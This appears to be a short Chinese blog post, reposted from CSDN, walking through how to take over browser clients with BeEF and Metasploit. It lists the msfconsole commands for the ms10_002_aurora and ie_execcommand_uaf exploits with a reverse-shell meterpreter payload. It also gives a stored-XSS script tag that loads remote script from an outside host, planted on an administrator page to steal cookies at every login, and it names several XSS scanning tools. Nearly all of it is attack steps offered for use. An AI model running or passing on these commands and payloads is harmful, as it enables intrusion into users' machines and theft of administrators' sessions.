07、beef+msf拿客户端shell

(ie6 xp)

kali 1.0自带beef和msf

cd /usr/share/beef-xss

./beef

访问UI url,账号密码都是beef

配置msf

msfconsole

use windows/browser/ms10_002_aurora

set PAYLOAD windows/meterpreter/reverse_tcp   回连

set SRVHOST ip地址     客户端访问的目标地址

set SRVPOST 7777

set URIPATH /

set LHOST ip地址    本地接收的地址

set LPORT 4444

exploit

随后会生成一个我们设置的:ip:7777的地址,这是要让用户访问的url。

触发漏洞后会回连我们的地址:ip:4444

此时beef就能监听到

msf:  sessions -i

sessions -i -

shell

(ie 7\8\9)

use exploit/windows/browser/ie_execcommand_uaf

set SRVHOST ip

set SRVPOST 8888

set URIPATH /

exploit

留后门:</tExtArEa>'"><sCRiPt sRC=//xsshs.cn/2rQH></sCrIpT>

将该代码放入管理员页面里。

此后管理员每次登录我们都能拿到cookie。

xss扫描工具:wvs\椰树\safe3\Xelenium\w3af\vega\xss扫描插件+burp

发布了782 篇原创文章 · 获赞 76 · 访问量 14万+

猜你喜欢

转载自blog.csdn.net/qq_41723615/article/details/105498731